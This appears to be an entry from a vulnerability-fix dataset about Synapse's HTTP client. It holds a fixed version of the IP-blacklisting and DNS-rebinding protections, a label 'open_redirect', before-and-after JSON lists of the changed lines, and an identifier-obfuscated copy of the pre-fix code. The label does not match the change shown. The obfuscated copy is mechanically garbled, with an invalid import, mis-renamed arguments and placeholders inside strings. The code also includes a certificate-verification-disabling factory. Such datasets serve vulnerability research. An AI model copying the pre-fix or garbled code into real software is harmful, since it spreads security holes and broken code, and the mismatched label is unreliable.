# the value actually has to be a List, but List is invariant so we can't specify that
# the entries can either be Lists or bytes.
RawHeaderValue = Sequence[Union[str, bytes]]
# the type of the query params, to be passed into `urlencode`
QueryParamValue = Union[str, bytes, Iterable[Union[str, bytes]]]
QueryParams = Union[Mapping[str, QueryParamValue], Mapping[bytes, QueryParamValue]]
def check_against_blacklist(
ip_address: IPAddress, ip_whitelist: Optional[IPSet], ip_blacklist: IPSet
) -> bool:
"""
Compares an IP address to allowed and disallowed IP sets.
Args:
ip_address: The IP address to check
ip_whitelist: Allowed IP addresses.
ip_blacklist: Disallowed IP addresses.
Returns:
True if the IP address is in the blacklist and not in the whitelist.
"""
if ip_address in ip_blacklist:
if ip_whitelist is None or ip_address not in ip_whitelist:
return True
return False
_EPSILON = 0.00000001
def _make_scheduler(reactor):
"""Makes a schedular suitable for a Cooperator using the given reactor.
(This is effectively just a copy from `twisted.internet.task`)
"""
def _scheduler(x):
return reactor.callLater(_EPSILON, x)
return _scheduler
class _IPBlacklistingResolver:
"""
A proxy for reactor.nameResolver which only produces non-blacklisted IP
addresses, preventing DNS rebinding attacks on URL preview.
"""
def __init__(
self,
reactor: IReactorPluggableNameResolver,
ip_whitelist: Optional[IPSet],
ip_blacklist: IPSet,
):
"""
Args:
reactor: The twisted reactor.
ip_whitelist: IP addresses to allow.
ip_blacklist: IP addresses to disallow.
"""
self._reactor = reactor
self._ip_whitelist = ip_whitelist
self._ip_blacklist = ip_blacklist
def resolveHostName(
self, recv: IResolutionReceiver, hostname: str, portNumber: int = 0
) -> IResolutionReceiver:
r = recv()
addresses = [] # type: List[IAddress]
def _callback() -> None:
r.resolutionBegan(None)
has_bad_ip = False
for i in addresses:
ip_address = IPAddress(i.host)
if check_against_blacklist(
ip_address, self._ip_whitelist, self._ip_blacklist
):
logger.info(
"Dropped %s from DNS resolution to %s due to blacklist"
% (ip_address, hostname)
)
has_bad_ip = True
# if we have a blacklisted IP, we'd like to raise an error to block the
# request, but all we can really do from here is claim that there were no
# valid results.
if not has_bad_ip:
for i in addresses:
r.addressResolved(i)
r.resolutionComplete()
@provider(IResolutionReceiver)
class EndpointReceiver:
@staticmethod
def resolutionBegan(resolutionInProgress: IHostResolution) -> None:
pass
@staticmethod
def addressResolved(address: IAddress) -> None:
addresses.append(address)
@staticmethod
def resolutionComplete() -> None:
_callback()
self._reactor.nameResolver.resolveHostName(
EndpointReceiver, hostname, portNumber=portNumber
)
return r
@implementer(IReactorPluggableNameResolver)
class BlacklistingReactorWrapper:
"""
A Reactor wrapper which will prevent DNS resolution to blacklisted IP
addresses, to prevent DNS rebinding.
"""
def __init__(
self,
reactor: IReactorPluggableNameResolver,
ip_whitelist: Optional[IPSet],
ip_blacklist: IPSet,
):
self._reactor = reactor
# We need to use a DNS resolver which filters out blacklisted IP
# addresses, to prevent DNS rebinding.
self._nameResolver = _IPBlacklistingResolver(
self._reactor, ip_whitelist, ip_blacklist
)
def __getattr__(self, attr: str) -> Any:
# Passthrough to the real reactor except for the DNS resolver.
if attr == "nameResolver":
return self._nameResolver
else:
return getattr(self._reactor, attr)
class BlacklistingAgentWrapper(Agent):
"""
An Agent wrapper which will prevent access to IP addresses being accessed
directly (without an IP address lookup).
"""
def __init__(
self,
agent: IAgent,
ip_whitelist: Optional[IPSet] = None,
ip_blacklist: Optional[IPSet] = None,
):
"""
Args:
agent: The Agent to wrap.
ip_whitelist: IP addresses to allow.
ip_blacklist: IP addresses to disallow.
"""
self._agent = agent
self._ip_whitelist = ip_whitelist
self._ip_blacklist = ip_blacklist
def request(
self,
method: bytes,
uri: bytes,
headers: Optional[Headers] = None,
bodyProducer: Optional[IBodyProducer] = None,
) -> defer.Deferred:
h = urllib.parse.urlparse(uri.decode("ascii"))
try:
ip_address = IPAddress(h.hostname)
if check_against_blacklist(
ip_address, self._ip_whitelist, self._ip_blacklist
):
logger.info("Blocking access to %s due to blacklist" % (ip_address,))
e = SynapseError(403, "IP address blocked by IP blacklist entry")
return defer.fail(Failure(e))
except Exception:
# Not an IP
pass
return self._agent.request(
method, uri, headers=headers, bodyProducer=bodyProducer
)
class SimpleHttpClient:
"""
A simple, no-frills HTTP client with methods that wrap up common ways of
using HTTP in Matrix
"""
def __init__(
self,
hs: "HomeServer",
treq_args: Dict[str, Any] = {},
ip_whitelist: Optional[IPSet] = None,
ip_blacklist: Optional[IPSet] = None,
http_proxy: Optional[bytes] = None,
https_proxy: Optional[bytes] = None,
):
"""
Args:
hs
treq_args: Extra keyword arguments to be given to treq.request.
ip_blacklist: The IP addresses that are blacklisted that
we may not request.
ip_whitelist: The whitelisted IP addresses, that we can
request if it were otherwise caught in a blacklist.
http_proxy: proxy server to use for http connections. host[:port]
https_proxy: proxy server to use for https connections. host[:port]
"""
self.hs = hs
self._ip_whitelist = ip_whitelist
self._ip_blacklist = ip_blacklist
self._extra_treq_args = treq_args
self.user_agent = hs.version_string
self.clock = hs.get_clock()
if hs.config.user_agent_suffix:
self.user_agent = "%s %s" % (self.user_agent, hs.config.user_agent_suffix)
# We use this for our body producers to ensure that they use the correct
# reactor.
self._cooperator = Cooperator(scheduler=_make_scheduler(hs.get_reactor()))
self.user_agent = self.user_agent.encode("ascii")
if self._ip_blacklist:
# If we have an IP blacklist, we need to use a DNS resolver which
# filters out blacklisted IP addresses, to prevent DNS rebinding.
self.reactor = BlacklistingReactorWrapper(
hs.get_reactor(), self._ip_whitelist, self._ip_blacklist
)
else:
self.reactor = hs.get_reactor()
# the pusher makes lots of concurrent SSL connections to sygnal, and
# tends to do so in batches, so we need to allow the pool to keep
# lots of idle connections around.
pool = HTTPConnectionPool(self.reactor)
# XXX: The justification for using the cache factor here is that larger instances
# will need both more cache and more connections.
# Still, this should probably be a separate dial
pool.maxPersistentPerHost = max((100 * hs.config.caches.global_factor, 5))
pool.cachedConnectionTimeout = 2 * 60
self.agent = ProxyAgent(
self.reactor,
connectTimeout=15,
contextFactory=self.hs.get_http_client_context_factory(),
pool=pool,
http_proxy=http_proxy,
https_proxy=https_proxy,
)
if self._ip_blacklist:
# If we have an IP blacklist, we then install the blacklisting Agent
# which prevents direct access to IP addresses, that are not caught
# by the DNS resolution.
self.agent = BlacklistingAgentWrapper(
self.agent,
ip_whitelist=self._ip_whitelist,
ip_blacklist=self._ip_blacklist,
)
async def request(
self,
method: str,
uri: str,
data: Optional[bytes] = None,
headers: Optional[Headers] = None,
) -> IResponse:
"""
Args:
method: HTTP method to use.
uri: URI to query.
data: Data to send in the request body, if applicable.
headers: Request headers.
Returns:
Response object, once the headers have been read.
Raises:
RequestTimedOutError if the request times out before the headers are read
"""
outgoing_requests_counter.labels(method).inc()
# log request but strip `access_token` (AS requests for example include this)
logger.debug("Sending request %s %s", method, redact_uri(uri))
with start_active_span(
"outgoing-client-request",
tags={
tags.SPAN_KIND: tags.SPAN_KIND_RPC_CLIENT,
tags.HTTP_METHOD: method,
tags.HTTP_URL: uri,
},
finish_on_close=True,
):
try:
body_producer = None
if data is not None:
body_producer = QuieterFileBodyProducer(
BytesIO(data), cooperator=self._cooperator,
)
request_deferred = treq.request(
method,
uri,
agent=self.agent,
data=body_producer,
headers=headers,
**self._extra_treq_args,
) # type: defer.Deferred
# we use our own timeout mechanism rather than treq's as a workaround
# for https://twistedmatrix.com/trac/ticket/9534.
request_deferred = timeout_deferred(
request_deferred, 60, self.hs.get_reactor(),
)
# turn timeouts into RequestTimedOutErrors
request_deferred.addErrback(_timeout_to_request_timed_out_error)
response = await make_deferred_yieldable(request_deferred)
incoming_responses_counter.labels(method, response.code).inc()
logger.info(
"Received response to %s %s: %s",
method,
redact_uri(uri),
response.code,
)
return response
except Exception as e:
incoming_responses_counter.labels(method, "ERR").inc()
logger.info(
"Error sending request to %s %s: %s %s",
method,
redact_uri(uri),
type(e).__name__,
e.args[0],
)
set_tag(tags.ERROR, True)
set_tag("error_reason", e.args[0])
raise
async def post_urlencoded_get_json(
self,
uri: str,
args: Optional[Mapping[str, Union[str, List[str]]]] = None,
headers: Optional[RawHeaders] = None,
) -> Any:
"""
Args:
uri: uri to query
args: parameters to be url-encoded in the body
headers: a map from header name to a list of values for that header
Returns:
parsed json
Raises:
RequestTimedOutError: if there is a timeout before the response headers
are received. Note there is currently no timeout on reading the response
body.
HttpResponseException: On a non-2xx HTTP response.
ValueError: if the response was not JSON
"""
# TODO: Do we ever want to log message contents?
logger.debug("post_urlencoded_get_json args: %s", args)
query_bytes = encode_query_args(args)
actual_headers = {
b"Content-Type": [b"application/x-www-form-urlencoded"],
b"User-Agent": [self.user_agent],
b"Accept": [b"application/json"],
}
if headers:
actual_headers.update(headers) # type: ignore
response = await self.request(
"POST", uri, headers=Headers(actual_headers), data=query_bytes
)
body = await make_deferred_yieldable(readBody(response))
if 200 <= response.code < 300:
return json_decoder.decode(body.decode("utf-8"))
else:
raise HttpResponseException(
response.code, response.phrase.decode("ascii", errors="replace"), body
)
async def post_json_get_json(
self, uri: str, post_json: Any, headers: Optional[RawHeaders] = None
) -> Any:
"""
Args:
uri: URI to query.
post_json: request body, to be encoded as json
headers: a map from header name to a list of values for that header
Returns:
parsed json
Raises:
RequestTimedOutError: if there is a timeout before the response headers
are received. Note there is currently no timeout on reading the response
body.
HttpResponseException: On a non-2xx HTTP response.
ValueError: if the response was not JSON
"""
json_str = encode_canonical_json(post_json)
logger.debug("HTTP POST %s -> %s", json_str, uri)
actual_headers = {
b"Content-Type": [b"application/json"],
b"User-Agent": [self.user_agent],
b"Accept": [b"application/json"],
}
if headers:
actual_headers.update(headers) # type: ignore
response = await self.request(
"POST", uri, headers=Headers(actual_headers), data=json_str
)
body = await make_deferred_yieldable(readBody(response))
if 200 <= response.code < 300:
return json_decoder.decode(body.decode("utf-8"))
else:
raise HttpResponseException(
response.code, response.phrase.decode("ascii", errors="replace"), body
)
async def get_json(
self,
uri: str,
args: Optional[QueryParams] = None,
headers: Optional[RawHeaders] = None,
) -> Any:
"""Gets some json from the given URI.
Args:
uri: The URI to request, not including query parameters
args: A dictionary used to create query string
headers: a map from header name to a list of values for that header
Returns:
Succeeds when we get a 2xx HTTP response, with the HTTP body as JSON.
Raises:
RequestTimedOutError: if there is a timeout before the response headers
are received. Note there is currently no timeout on reading the response
body.
HttpResponseException On a non-2xx HTTP response.
ValueError: if the response was not JSON
"""
actual_headers = {b"Accept": [b"application/json"]}
if headers:
actual_headers.update(headers) # type: ignore
body = await self.get_raw(uri, args, headers=headers)
return json_decoder.decode(body.decode("utf-8"))
async def put_json(
self,
uri: str,
json_body: Any,
args: Optional[QueryParams] = None,
headers: RawHeaders = None,
) -> Any:
"""Puts some json to the given URI.
Args:
uri: The URI to request, not including query parameters
json_body: The JSON to put in the HTTP body,
args: A dictionary used to create query strings
headers: a map from header name to a list of values for that header
Returns:
Succeeds when we get a 2xx HTTP response, with the HTTP body as JSON.
Raises:
RequestTimedOutError: if there is a timeout before the response headers
are received. Note there is currently no timeout on reading the response
body.
HttpResponseException On a non-2xx HTTP response.
ValueError: if the response was not JSON
"""
if args:
query_str = urllib.parse.urlencode(args, True)
uri = "%s?%s" % (uri, query_str)
json_str = encode_canonical_json(json_body)
actual_headers = {
b"Content-Type": [b"application/json"],
b"User-Agent": [self.user_agent],
b"Accept": [b"application/json"],
}
if headers:
actual_headers.update(headers) # type: ignore
response = await self.request(
"PUT", uri, headers=Headers(actual_headers), data=json_str
)
body = await make_deferred_yieldable(readBody(response))
if 200 <= response.code < 300:
return json_decoder.decode(body.decode("utf-8"))
else:
raise HttpResponseException(
response.code, response.phrase.decode("ascii", errors="replace"), body
)
async def get_raw(
self,
uri: str,
args: Optional[QueryParams] = None,
headers: Optional[RawHeaders] = None,
) -> bytes:
"""Gets raw text from the given URI.
Args:
uri: The URI to request, not including query parameters
args: A dictionary used to create query strings
headers: a map from header name to a list of values for that header
Returns:
Succeeds when we get a 2xx HTTP response, with the
HTTP body as bytes.
Raises:
RequestTimedOutError: if there is a timeout before the response headers
are received. Note there is currently no timeout on reading the response
body.
HttpResponseException on a non-2xx HTTP response.
"""
if args:
query_str = urllib.parse.urlencode(args, True)
uri = "%s?%s" % (uri, query_str)
actual_headers = {b"User-Agent": [self.user_agent]}
if headers:
actual_headers.update(headers) # type: ignore
response = await self.request("GET", uri, headers=Headers(actual_headers))
body = await make_deferred_yieldable(readBody(response))
if 200 <= response.code < 300:
return body
else:
raise HttpResponseException(
response.code, response.phrase.decode("ascii", errors="replace"), body
)
# XXX: FIXME: This is horribly copy-pasted from matrixfederationclient.
# The two should be factored out.
async def get_file(
self,
url: str,
output_stream: BinaryIO,
max_size: Optional[int] = None,
headers: Optional[RawHeaders] = None,
) -> Tuple[int, Dict[bytes, List[bytes]], str, int]:
"""GETs a file from a given URL
Args:
url: The URL to GET
output_stream: File to write the response body to.
headers: A map from header name to a list of values for that header
Returns:
A tuple of the file length, dict of the response
headers, absolute URI of the response and HTTP response code.
Raises:
RequestTimedOutError: if there is a timeout before the response headers
are received. Note there is currently no timeout on reading the response
body.
SynapseError: if the response is not a 2xx, the remote file is too large, or
another exception happens during the download.
"""
actual_headers = {b"User-Agent": [self.user_agent]}
if headers:
actual_headers.update(headers) # type: ignore
response = await self.request("GET", url, headers=Headers(actual_headers))
resp_headers = dict(response.headers.getAllRawHeaders())
if (
b"Content-Length" in resp_headers
and max_size
and int(resp_headers[b"Content-Length"][0]) > max_size
):
logger.warning("Requested URL is too large > %r bytes" % (max_size,))
raise SynapseError(
502,
"Requested file is too large > %r bytes" % (max_size,),
Codes.TOO_LARGE,
)
if response.code > 299:
logger.warning("Got %d when downloading %s" % (response.code, url))
raise SynapseError(502, "Got error %d" % (response.code,), Codes.UNKNOWN)
# TODO: if our Content-Type is HTML or something, just read the first
# N bytes into RAM rather than saving it all to disk only to read it
# straight back in again
try:
length = await make_deferred_yieldable(
readBodyToFile(response, output_stream, max_size)
)
except SynapseError:
# This can happen e.g. because the body is too large.
raise
except Exception as e:
raise SynapseError(502, ("Failed to download remote body: %s" % e)) from e
return (
length,
resp_headers,
response.request.absoluteURI.decode("ascii"),
response.code,
)
def _timeout_to_request_timed_out_error(f: Failure):
if f.check(twisted_error.TimeoutError, twisted_error.ConnectingCancelledError):
# The TCP connection has its own timeout (set by the 'connectTimeout' param
# on the Agent), which raises twisted_error.TimeoutError exception.
raise RequestTimedOutError("Timeout connecting to remote server")
elif f.check(defer.TimeoutError, ResponseNeverReceived):
# this one means that we hit our overall timeout on the request
raise RequestTimedOutError("Timeout waiting for response from remote server")
return f
class _ReadBodyToFileProtocol(protocol.Protocol):
def __init__(
self, stream: BinaryIO, deferred: defer.Deferred, max_size: Optional[int]
):
self.stream = stream
self.deferred = deferred
self.length = 0
self.max_size = max_size
def dataReceived(self, data: bytes) -> None:
self.stream.write(data)
self.length += len(data)
if self.max_size is not None and self.length >= self.max_size:
self.deferred.errback(
SynapseError(
502,
"Requested file is too large > %r bytes" % (self.max_size,),
Codes.TOO_LARGE,
)
)
self.deferred = defer.Deferred()
self.transport.loseConnection()
def connectionLost(self, reason: Failure) -> None:
if reason.check(ResponseDone):
self.deferred.callback(self.length)
elif reason.check(PotentialDataLoss):
# stolen from https://github.com/twisted/treq/pull/49/files
# http://twistedmatrix.com/trac/ticket/4840
self.deferred.callback(self.length)
else:
self.deferred.errback(reason)
def readBodyToFile(
response: IResponse, stream: BinaryIO, max_size: Optional[int]
) -> defer.Deferred:
"""
Read a HTTP response body to a file-object. Optionally enforcing a maximum file size.
Args:
response: The HTTP response to read from.
stream: The file-object to write to.
max_size: The maximum file size to allow.
Returns:
A Deferred which resolves to the length of the read body.
"""
d = defer.Deferred()
response.deliverBody(_ReadBodyToFileProtocol(stream, d, max_size))
return d
def encode_query_args(args: Optional[Mapping[str, Union[str, List[str]]]]) -> bytes:
"""
Encodes a map of query arguments to bytes which can be appended to a URL.
Args:
args: The query arguments, a mapping of string to string or list of strings.
Returns:
The query arguments encoded as bytes.
"""
if args is None:
return b""
encoded_args = {}
for k, vs in args.items():
if isinstance(vs, str):
vs = [vs]
encoded_args[k] = [v.encode("utf8") for v in vs]
query_str = urllib.parse.urlencode(encoded_args, True)
return query_str.encode("utf8")
class InsecureInterceptableContextFactory(ssl.ContextFactory):
"""
Factory for PyOpenSSL SSL contexts which accepts any certificate for any domain.
Do not use this since it allows an attacker to intercept your communications.
"""
def __init__(self):
self._context = SSL.Context(SSL.SSLv23_METHOD)
self._context.set_verify(VERIFY_NONE, lambda *_: None)
def getContext(self, hostname=None, port=None):
return self._context
def creatorForNetloc(self, hostname, port):
return self
| open_redirect | {
"code": [
"class IPBlacklistingResolver:",
" real_reactor = hs.get_reactor()",
" nameResolver = IPBlacklistingResolver(",
" real_reactor, self._ip_whitelist, self._ip_blacklist",
" @implementer(IReactorPluggableNameResolver)",
" class Reactor:",
" def __getattr__(_self, attr):",
" if attr == \"nameResolver\":",
" return nameResolver",
" else:",
" return getattr(real_reactor, attr)",
" self.reactor = Reactor()"
],
"line_no": [
128,
295,
298,
299,
302,
303,
304,
305,
306,
307,
308,
310
]
} | {
"code": [
"class _IPBlacklistingResolver:",
"@implementer(IReactorPluggableNameResolver)",
" \"\"\"",
" addresses, to prevent DNS rebinding.",
" def __init__(",
" self,",
" reactor: IReactorPluggableNameResolver,",
" ip_whitelist: Optional[IPSet],",
" ip_blacklist: IPSet,",
" self._reactor = reactor",
" self._reactor, ip_whitelist, ip_blacklist",
" )",
" if attr == \"nameResolver\":",
" return self._nameResolver",
" else:",
" return getattr(self._reactor, attr)",
" self.reactor = BlacklistingReactorWrapper(",
" hs.get_reactor(), self._ip_whitelist, self._ip_blacklist"
],
"line_no": [
128,
202,
204,
206,
209,
210,
211,
212,
213,
215,
220,
221,
225,
226,
227,
228,
326,
327
]
} |
import logging
import .urllib.parse
from io import BytesIO
from typing import (
TYPE_CHECKING,
Any,
BinaryIO,
Dict,
Iterable,
List,
Mapping,
Optional,
Sequence,
Tuple,
Union,
)
import treq
from canonicaljson import .encode_canonical_json
from netaddr import IPAddress, IPSet
from prometheus_client import Counter
from zope.interface import implementer, provider
from OpenSSL import SSL
from OpenSSL.SSL import VERIFY_NONE
from twisted.internet import .defer, error as twisted_error, protocol, ssl
from twisted.internet.interfaces import (
IAddress,
IHostResolution,
IReactorPluggableNameResolver,
IResolutionReceiver,
)
from twisted.internet.task import Cooperator
from twisted.python.failure import Failure
from twisted.web._newclient import ResponseDone
from twisted.web.client import (
Agent,
HTTPConnectionPool,
ResponseNeverReceived,
readBody,
)
from twisted.web.http import PotentialDataLoss
from twisted.web.http_headers import Headers
from twisted.web.iweb import IAgent, IBodyProducer, IResponse
from synapse.api.errors import Codes, HttpResponseException, SynapseError
from synapse.http import QuieterFileBodyProducer, RequestTimedOutError, redact_uri
from synapse.http.proxyagent import ProxyAgent
from synapse.logging.context import make_deferred_yieldable
from synapse.logging.opentracing import set_tag, start_active_span, tags
from synapse.util import json_decoder
from synapse.util.async_helpers import timeout_deferred
if TYPE_CHECKING:
from synapse.app.homeserver import HomeServer
VAR_0 = logging.getLogger(__name__)
VAR_1 = Counter("synapse_http_client_requests", "", ["method"])
VAR_2 = Counter(
"synapse_http_client_responses", "", ["method", "code"]
)
VAR_3 = Union[Mapping[str, "RawHeaderValue"], Mapping[bytes, "RawHeaderValue"]]
VAR_4 = Sequence[Union[str, bytes]]
VAR_5 = Union[str, bytes, Iterable[Union[str, bytes]]]
VAR_6 = Union[Mapping[str, VAR_5], Mapping[bytes, VAR_5]]
def FUNC_0(
VAR_7: IPAddress, VAR_8: Optional[IPSet], VAR_9: IPSet
) -> bool:
if VAR_7 in VAR_9:
if VAR_8 is None or VAR_7 not in VAR_8:
return True
return False
VAR_10 = 0.00000001
def FUNC_1(VAR_11):
def FUNC_5(VAR_17):
return VAR_11.callLater(VAR_10, VAR_17)
return FUNC_5
class CLASS_0:
def __init__(
self,
VAR_11: IReactorPluggableNameResolver,
VAR_8: Optional[IPSet],
VAR_9: IPSet,
):
self._reactor = VAR_11
self._ip_whitelist = VAR_8
self._ip_blacklist = VAR_9
def FUNC_6(
self, VAR_18: IResolutionReceiver, VAR_19: str, VAR_20: int = 0
) -> IResolutionReceiver:
VAR_41 = VAR_18()
VAR_42 = [] # type: List[IAddress]
def FUNC_18() -> None:
VAR_41.resolutionBegan(None)
VAR_51 = False
for i in VAR_42:
VAR_7 = IPAddress(i.host)
if FUNC_0(
VAR_7, self._ip_whitelist, self._ip_blacklist
):
VAR_0.info(
"Dropped %s from DNS resolution to %s due to blacklist"
% (VAR_7, VAR_19)
)
VAR_51 = True
if not VAR_51:
for i in VAR_42:
VAR_41.addressResolved(i)
VAR_41.resolutionComplete()
@provider(IResolutionReceiver)
class CLASS_5:
@staticmethod
def FUNC_19(VAR_52: IHostResolution) -> None:
pass
@staticmethod
def FUNC_20(VAR_53: IAddress) -> None:
VAR_42.append(VAR_53)
@staticmethod
def FUNC_21() -> None:
FUNC_18()
self._reactor.nameResolver.resolveHostName(
CLASS_5, VAR_19, VAR_20=portNumber
)
return VAR_41
class CLASS_1(Agent):
def __init__(
self,
VAR_21: IAgent,
VAR_8: Optional[IPSet] = None,
VAR_9: Optional[IPSet] = None,
):
self._agent = VAR_21
self._ip_whitelist = VAR_8
self._ip_blacklist = VAR_9
def FUNC_7(
self,
VAR_22: bytes,
VAR_23: bytes,
VAR_24: Optional[Headers] = None,
VAR_25: Optional[IBodyProducer] = None,
) -> defer.Deferred:
VAR_43 = urllib.parse.urlparse(VAR_23.decode("ascii"))
try:
VAR_7 = IPAddress(VAR_43.hostname)
if FUNC_0(
VAR_7, self._ip_whitelist, self._ip_blacklist
):
VAR_0.info("Blocking access to %s due to blacklist" % (VAR_7,))
VAR_58 = SynapseError(403, "IP VAR_53 blocked by IP blacklist entry")
return defer.fail(Failure(VAR_58))
except Exception:
pass
return self._agent.request(
VAR_22, VAR_23, VAR_24=headers, VAR_25=bodyProducer
)
class CLASS_2:
def __init__(
self,
VAR_26: "HomeServer",
VAR_27: Dict[str, Any] = {},
VAR_8: Optional[IPSet] = None,
VAR_9: Optional[IPSet] = None,
VAR_28: Optional[bytes] = None,
VAR_29: Optional[bytes] = None,
):
self.hs = VAR_26
self._ip_whitelist = VAR_8
self._ip_blacklist = VAR_9
self._extra_treq_args = VAR_27
self.user_agent = VAR_26.version_string
self.clock = VAR_26.get_clock()
if VAR_26.config.user_agent_suffix:
self.user_agent = "%s %s" % (self.user_agent, VAR_26.config.user_agent_suffix)
self._cooperator = Cooperator(scheduler=FUNC_1(VAR_26.get_reactor()))
self.user_agent = self.user_agent.encode("ascii")
if self._ip_blacklist:
VAR_54 = VAR_26.get_reactor()
VAR_55 = CLASS_0(
VAR_54, self._ip_whitelist, self._ip_blacklist
)
@implementer(IReactorPluggableNameResolver)
class CLASS_6:
def __getattr__(VAR_59, VAR_60):
if VAR_60 == "nameResolver":
return VAR_55
else:
return getattr(VAR_54, VAR_60)
self.reactor = CLASS_6()
else:
self.reactor = VAR_26.get_reactor()
VAR_44 = HTTPConnectionPool(self.reactor)
VAR_44.maxPersistentPerHost = max((100 * VAR_26.config.caches.global_factor, 5))
VAR_44.cachedConnectionTimeout = 2 * 60
self.agent = ProxyAgent(
self.reactor,
connectTimeout=15,
contextFactory=self.hs.get_http_client_context_factory(),
VAR_44=pool,
VAR_28=http_proxy,
VAR_29=https_proxy,
)
if self._ip_blacklist:
self.agent = CLASS_1(
self.agent,
VAR_8=self._ip_whitelist,
VAR_9=self._ip_blacklist,
)
async def FUNC_7(
self,
VAR_22: str,
VAR_23: str,
VAR_30: Optional[bytes] = None,
VAR_24: Optional[Headers] = None,
) -> IResponse:
VAR_1.labels(VAR_22).inc()
VAR_0.debug("Sending FUNC_7 %s %s", VAR_22, redact_uri(VAR_23))
with start_active_span(
"outgoing-client-request",
tags={
tags.SPAN_KIND: tags.SPAN_KIND_RPC_CLIENT,
tags.HTTP_METHOD: VAR_22,
tags.HTTP_URL: VAR_23,
},
finish_on_close=True,
):
try:
VAR_61 = None
if VAR_30 is not None:
VAR_61 = QuieterFileBodyProducer(
BytesIO(VAR_30), cooperator=self._cooperator,
)
VAR_62 = treq.request(
VAR_22,
VAR_23,
VAR_21=self.agent,
VAR_30=VAR_61,
VAR_24=headers,
**self._extra_treq_args,
) # type: defer.Deferred
VAR_62 = timeout_deferred(
VAR_62, 60, self.hs.get_reactor(),
)
VAR_62.addErrback(FUNC_2)
VAR_13 = await make_deferred_yieldable(VAR_62)
VAR_2.labels(VAR_22, VAR_13.code).inc()
VAR_0.info(
"Received VAR_13 to %s %s: %s",
VAR_22,
redact_uri(VAR_23),
VAR_13.code,
)
return VAR_13
except Exception as VAR_58:
VAR_2.labels(VAR_22, "ERR").inc()
VAR_0.info(
"Error sending FUNC_7 to %s %s: %s %s",
VAR_22,
redact_uri(VAR_23),
type(VAR_58).__name__,
VAR_58.args[0],
)
set_tag(tags.ERROR, True)
set_tag("error_reason", VAR_58.args[0])
raise
async def FUNC_8(
self,
VAR_23: str,
VAR_16: Optional[Mapping[str, Union[str, List[str]]]] = None,
VAR_24: Optional[VAR_3] = None,
) -> Any:
VAR_0.debug("post_urlencoded_get_json VAR_16: %s", VAR_16)
VAR_45 = FUNC_4(VAR_16)
VAR_46 = {
b"Content-Type": [b"application/VAR_17-www-form-urlencoded"],
b"User-Agent": [self.user_agent],
b"Accept": [b"application/json"],
}
if VAR_24:
VAR_46.update(VAR_24) # type: ignore
VAR_13 = await self.request(
"POST", VAR_23, VAR_24=Headers(VAR_46), VAR_30=VAR_45
)
VAR_47 = await make_deferred_yieldable(readBody(VAR_13))
if 200 <= VAR_13.code < 300:
return json_decoder.decode(VAR_47.decode("utf-8"))
else:
raise HttpResponseException(
VAR_13.code, VAR_13.phrase.decode("ascii", errors="replace"), VAR_47
)
async def FUNC_9(
self, VAR_23: str, VAR_31: Any, VAR_24: Optional[VAR_3] = None
) -> Any:
VAR_48 = encode_canonical_json(VAR_31)
VAR_0.debug("HTTP POST %s -> %s", VAR_48, VAR_23)
VAR_46 = {
b"Content-Type": [b"application/json"],
b"User-Agent": [self.user_agent],
b"Accept": [b"application/json"],
}
if VAR_24:
VAR_46.update(VAR_24) # type: ignore
VAR_13 = await self.request(
"POST", VAR_23, VAR_24=Headers(VAR_46), VAR_30=VAR_48
)
VAR_47 = await make_deferred_yieldable(readBody(VAR_13))
if 200 <= VAR_13.code < 300:
return json_decoder.decode(VAR_47.decode("utf-8"))
else:
raise HttpResponseException(
VAR_13.code, VAR_13.phrase.decode("ascii", errors="replace"), VAR_47
)
async def FUNC_10(
self,
VAR_23: str,
VAR_16: Optional[VAR_6] = None,
VAR_24: Optional[VAR_3] = None,
) -> Any:
VAR_46 = {b"Accept": [b"application/json"]}
if VAR_24:
VAR_46.update(VAR_24) # type: ignore
VAR_47 = await self.get_raw(VAR_23, VAR_16, VAR_24=headers)
return json_decoder.decode(VAR_47.decode("utf-8"))
async def FUNC_11(
self,
VAR_23: str,
VAR_32: Any,
VAR_16: Optional[VAR_6] = None,
VAR_24: VAR_3 = None,
) -> Any:
if VAR_16:
VAR_39 = urllib.parse.urlencode(VAR_16, True)
VAR_23 = "%s?%s" % (VAR_23, VAR_39)
VAR_48 = encode_canonical_json(VAR_32)
VAR_46 = {
b"Content-Type": [b"application/json"],
b"User-Agent": [self.user_agent],
b"Accept": [b"application/json"],
}
if VAR_24:
VAR_46.update(VAR_24) # type: ignore
VAR_13 = await self.request(
"PUT", VAR_23, VAR_24=Headers(VAR_46), VAR_30=VAR_48
)
VAR_47 = await make_deferred_yieldable(readBody(VAR_13))
if 200 <= VAR_13.code < 300:
return json_decoder.decode(VAR_47.decode("utf-8"))
else:
raise HttpResponseException(
VAR_13.code, VAR_13.phrase.decode("ascii", errors="replace"), VAR_47
)
async def FUNC_12(
self,
VAR_23: str,
VAR_16: Optional[VAR_6] = None,
VAR_24: Optional[VAR_3] = None,
) -> bytes:
if VAR_16:
VAR_39 = urllib.parse.urlencode(VAR_16, True)
VAR_23 = "%s?%s" % (VAR_23, VAR_39)
VAR_46 = {b"User-Agent": [self.user_agent]}
if VAR_24:
VAR_46.update(VAR_24) # type: ignore
VAR_13 = await self.request("GET", VAR_23, VAR_24=Headers(VAR_46))
VAR_47 = await make_deferred_yieldable(readBody(VAR_13))
if 200 <= VAR_13.code < 300:
return VAR_47
else:
raise HttpResponseException(
VAR_13.code, VAR_13.phrase.decode("ascii", errors="replace"), VAR_47
)
async def FUNC_13(
self,
VAR_33: str,
VAR_34: BinaryIO,
VAR_15: Optional[int] = None,
VAR_24: Optional[VAR_3] = None,
) -> Tuple[int, Dict[bytes, List[bytes]], str, int]:
VAR_46 = {b"User-Agent": [self.user_agent]}
if VAR_24:
VAR_46.update(VAR_24) # type: ignore
VAR_13 = await self.request("GET", VAR_33, VAR_24=Headers(VAR_46))
VAR_49 = dict(VAR_13.headers.getAllRawHeaders())
if (
b"Content-Length" in VAR_49
and VAR_15
and int(VAR_49[b"Content-Length"][0]) > VAR_15
):
VAR_0.warning("Requested URL is too large > %VAR_41 bytes" % (VAR_15,))
raise SynapseError(
502,
"Requested file is too large > %VAR_41 bytes" % (VAR_15,),
Codes.TOO_LARGE,
)
if VAR_13.code > 299:
VAR_0.warning("Got %VAR_37 when downloading %s" % (VAR_13.code, VAR_33))
raise SynapseError(502, "Got error %d" % (VAR_13.code,), Codes.UNKNOWN)
try:
VAR_56 = await make_deferred_yieldable(
FUNC_3(VAR_13, VAR_34, VAR_15)
)
except SynapseError:
raise
except Exception as VAR_58:
raise SynapseError(502, ("Failed to download remote VAR_47: %s" % VAR_58)) from VAR_58
return (
VAR_56,
VAR_49,
VAR_13.request.absoluteURI.decode("ascii"),
VAR_13.code,
)
